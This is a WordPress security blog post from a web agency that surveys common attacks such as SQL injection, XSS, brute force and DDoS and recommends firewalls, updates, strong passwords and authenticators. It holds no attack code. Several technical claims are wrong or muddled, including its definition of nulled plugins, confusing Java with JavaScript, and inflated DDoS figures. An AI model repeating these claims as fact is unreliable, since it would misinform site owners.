The Only WordPress Security Guide You Need

Website security is a major concern for us and we work mostly with WordPress security so we will try to focus on that. We have seen so many websites have downtime of multiple months just because of a small lapse in security. We understand that it can often be expensive to pay for monthly security, but it is incredibly necessary as your website begins to gain more and more traffic. We have a few great WordPress security tips that will help you secure your WordPress website and make sure that you don’t lose all of your hard work to hackers and scammers. So we’ve taken it upon ourselves to lay out the easiest ways to keep your WordPress website secure and also give you a run down of the attacks we see most frequently. There are a few simple steps that you can take to help you set up and check security and set yourself up to be safe out there on the internet. But, let’s start with what sort of vulnerabilities your website might have!

Common WordPress Intrusions
There are a few different types of intrusions that we see very often. These include SQL injection attacks, nulled plugins, XSS attacks, Brute force attacks, DDoS Attacks, and vulnerable themes. Let’s run through each and give a brief overview of what the attack entails and how it happens. The simplest form of an attack comes in the form of nulled themes or plugins, a nulled theme or plugin is a website element that hasn’t been updated or downloaded from an unreliable source. Oftentimes these plugins or themes will have a vulnerability or a built in virus of some kind. The vulnerability will then be exploited by whomever put the backdoor in the apps. This can be more commonly referred to as a general malware attack. SQL injection is when malicious code is added by user input, XSS is when code is added by JavaScript to the user output. Brute force and DDoS attacks both rely on a machine based volumetric attack style that we will break down in further detail:

SQL Injection
SQL injection attacks are quite common on WordPress and only lose to DDoS as the most common. SQL is a programming language many website databases are written into, this means that an SQL injection attack will involve an non secured input form that could be anything from a comment section to your contact form on the website. An SQL injection will involve typing in database commands to gain access to your administrative accounts. SQL is very easy to defend against and we will cover which during the firewall section, but the simple answer is to just sanitize user input. The best way to sanitize user input on a WordPress website is to add a firewall plugin. But of course you can do so with custom code yourself if you have the ability.

Brute Force Attacks
Brute Force Attacks are some of the least advanced as well as the most advanced. Brute force attacks require powerful computers or multiple networked computers to attempt a huge number of combinations on a website’s passwords. These are very easy to defend against, but can be extremely destructive if you don’t protect your site. There are quite a few steps you can take to prevent brute force attacks, and they are much the same as for other attacks. However, there are some additional fixes for brute force attacks that help protect you further.

Cross-Site Scripting (XSS)
Cross-Site Scripting otherwise referred to as XSS injection is the process by which malicious JavaScript code is injected into outbound user information. This can be particularly hard to notice once it actually occurs. Luckily the same way sanitizing inbound user input prevents SQL injection attacks, sanitizing user output will prevent XSS attacks. It works in much the same way as an SQl injection attack in that code is injected to execute a non-native script that normally contains a significant amount of malicious code. This is normally added to a website or web application that is normally upstanding, but has a vulnerability that is able to be exploited by the hacker to place the malicious code snippet. The website is essentially used as a tool to install whatever code the hackers wishes to infect the user with ranging from advertisements to even worse malware.

What XSS Means For Your Users
Many site owners will think that a serious XSS vulnerability is more of a problem for the users than the website. But, being compromised will means that your users can be pulled from you pager and the potential hacker will be able to inject code into the website your users see and show them sweeping changes. Hackers could redesign your entire website if they wanted to. Which, is obviously severely detrimental to any website, especially a business website. So since we’ve gotten the severity of XSS vulnerabilities clarified we can go into more detail.

How Dangerous Can XSS Attacks Be?
It’s fairly common that XSS issues are ranked as a lower priority than may of the other forms of vulnerabilities that may be found on your website. However, there is still a very real and pervasive threat that can be expected from any exploits of said XSS website vulnerabilities. Most of the time Java is very tightly controlled for the user and is unable to do much to users files aside from appearing in the browser.

Where the real issue arises is when the java is used as an avenue for the malicious actor to then add code which points to something more directly harmful to the users. Much the same as malware infections this could be to spam them with ads that may end up causing them to get a virus. While the virus won’t actually be from your website, they will certainly believe that you are the one that has given them the virus in question. The arbitrary nature of XSS attackers is what makes them so dangerous to your users you may not spot the first person putting advertisements to make the quick dollar but when that vulnerability graduates to full scale malware attacks, then you had better hope you can fix it fast!

DDoS Attacks
A distributed denial of service (DDoS) attack is the most common type of attack perpetrated against both users and websites. They essentially boil down to a user or multiple users making a request of the website in huge numbers in a very short time. The most frequent effect of this type of attack is a website will go down because the web-server simply can not fulfill all the requests. Luckily, this type of attack is easily mitigated by both a firewall software and a google content delivery network (CDN).

How DDoS Attacks Work?
When in the midst of a DDos attack a server, website, or network will be sent requests for data relevant to the network by these devices will make a massive amount of requests in a very short duration to the tune of three million per second in advanced attacks. Most servers can not handle the volume and will either go down or expose certain section of their website to severe vulnerabilities. Of course, there is no uniformity to DDoS attack, as there are a wide width of potential attack that can potentially be made against your website.

Volumetric DDoS
The most common type of DDoS attack and the most easily done by lower tier hacker the volumetric DDoS attack uses slaved systems from either computers with viruses or large server farms to achieve the denial of service needs. These can sometimes be referred to as connection flood attacks and are frequently the types of attacks you will deal with for your website.

OSI Layered Attacks
These are more specifically infected system with a built in program that can generate to the tune of 5-15 terabytes per second of request data to your web-server. A huge number that only the most hardy of websites are built to deal with. Any large website can frequently expect an attack of this nature almost daily. It’s common for this type of attack to be used as a precursor to some kind of electronic theft.

Old WordPress and PHP versions
Old WordPress and PHP versions are another major cause of intrusions but for the most part these will almost fall under the same vein as malware. Since there will be some major issues in the code that can be easily exploited to install malware onto the site with an older PHP or WordPress version. The intrusions generally present on older versions of WordPress or PHP tend to be adware or spyware, which will show malicious advertisements or track your users respectively. The best way to avoid these intrusions is to keep your website as up to date as possible and frequently backup your site.

Creating Better Passwords
Your password is the front line of defense for your website. There is no security system that will protect you from your own easy to guess passwords. The worst password are in some way related to public information about yourself or include common dictionary words. The most secure passwords are random strings of words and numbers in entirely random order. Just that one simple change will save you a lot of grief and prevent your website from being brute forced or having some random person login and wreak havoc.

Using an Authenticator
Authenticators are great since they will keep your site safe from a lot of low level attacks that are the most common on the web. Authenticators are at their core a secondary form of confirmation of identity and can take many forms. The most common is google authenticator or SMS authenticators. You can download one of the many plugins which serve as effective authenticator methods. Use whichever is your preference and watch the value of your security skyrocket. While we don’t have a list of the best plugins you can find a few here.

WordPress Security Conclusion
Now that you are familiar with the world of XSS, DDoS, and beyond you can begin taking steps to secure your WordPress website and prevent any further destruction. Investing in your security is always a good investment. Don’t lose all of your hard work just because you are trying to save a few bucks on the side. Invest the time and money into creating a security plan that will defend your website effectively. You will save an immense amount of time and headache by just having everything up to date and defended. So get that firewall up, authenticate those passwords, and watch out for potential security risks. As always, your friends here at Caveni are happy to help you come up with a plan to keep your website defended, so if you need more help, don’t be afraid to contact us.